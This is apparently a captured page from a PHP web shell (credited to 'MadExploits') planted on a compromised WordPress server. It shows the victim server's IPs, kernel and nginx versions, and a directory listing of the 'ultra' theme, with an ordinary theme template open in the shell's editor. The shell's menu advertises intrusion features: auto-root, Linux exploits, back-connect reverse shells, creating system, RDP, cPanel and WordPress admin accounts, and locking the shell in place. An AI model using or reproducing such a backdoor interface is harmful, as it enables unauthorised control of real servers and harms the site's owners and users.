Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
leadnepal /
wp-content /
themes /
ultra /
[ HOME SHELL ]
Name
Size
Permission
Action
breadcrumbs
[ DIR ]
drwxr-xr-x
demo
[ DIR ]
drwxr-xr-x
font-awesome
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
loops
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
parts
[ DIR ]
drwxr-xr-x
sass
[ DIR ]
drwxr-xr-x
slider
[ DIR ]
drwxr-xr-x
upgrade
[ DIR ]
drwxr-xr-x
woocommerce
[ DIR ]
drwxr-xr-x
404.php
1.92
KB
-rwxr-xr-x
archive.php
965
B
-rwxr-xr-x
changelog.txt
14
KB
-rwxr-xr-x
comments.php
1.81
KB
-rwxr-xr-x
content-none.php
1.15
KB
-rwxr-xr-x
content-page.php
963
B
-rwxr-xr-x
content-search.php
828
B
-rwxr-xr-x
content-single.php
949
B
-rwxr-xr-x
content.php
1.58
KB
-rwxr-xr-x
footer.php
14.07
KB
-rwxr-xr-x
functions.php
21.64
KB
-rwxr-xr-x
header.php
2.68
KB
-rwxr-xr-x
home-panels.php
765
B
-rwxr-xr-x
index.php
1.26
KB
-rwxr-xr-x
license.txt
14.69
KB
-rwxr-xr-x
page.php
1.23
KB
-rwxr-xr-x
readme.txt
8.42
KB
-rwxr-xr-x
screenshot.png
286.39
KB
-rwxr-xr-x
search.php
1.34
KB
-rwxr-xr-x
searchform.php
739
B
-rwxr-xr-x
sidebar.php
513
B
-rwxr-xr-x
single.php
1.51
KB
-rwxr-xr-x
style.css
114.38
KB
-rwxr-xr-x
wpml-config.xml
548
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : content.php
<?php /** * Template part for displaying posts. * * @link https://codex.wordpress.org/Template_Hierarchy * * @package ultra * @since ultra 0.9 * @license GPL 2.0 */ ?> <article id="post-<?php the_ID(); ?>" <?php post_class(); ?>> <?php if ( ! is_single() && has_post_thumbnail() && siteorigin_setting( 'blog_archive_featured_image' ) ) : ?> <div class="entry-thumbnail"> <a href="<?php the_permalink(); ?>" title="<?php the_title(); ?>"> <?php the_post_thumbnail(); ?> </a> </div> <?php elseif ( is_single() && has_post_thumbnail() && siteorigin_setting( 'blog_archive_featured_image' ) ) : ?> <div class="entry-thumbnail"> <?php the_post_thumbnail(); ?> </div> <?php endif; ?> <header class="entry-header"> <?php the_title( sprintf( '<h2 class="entry-title"><a href="%s" rel="bookmark">', esc_url( get_permalink() ) ), '</a></h2>' ); ?> <?php if ( 'post' == get_post_type() ) : ?> <div class="entry-meta"> <?php ultra_posted_on(); ?> </div><!-- .entry-meta --> <?php endif; ?> </header><!-- .entry-header --> <div class="entry-content"> <?php if ( siteorigin_setting( 'blog_archive_content' ) == 'excerpt' ) ultra_excerpt(); else the_content(); ?> <?php wp_link_pages( array( 'before' => '<div class="page-links"><span class="page-links-title">' . esc_html__( 'Pages:', 'ultra' ) . '</span>', 'after' => '</div>', 'link_before' => '<span>', 'link_after' => '</span>', ) ); ?> </div><!-- .entry-content --> <footer class="entry-footer"> <?php ultra_entry_footer(); ?> </footer><!-- .entry-footer --> </article><!-- #post-## -->
Close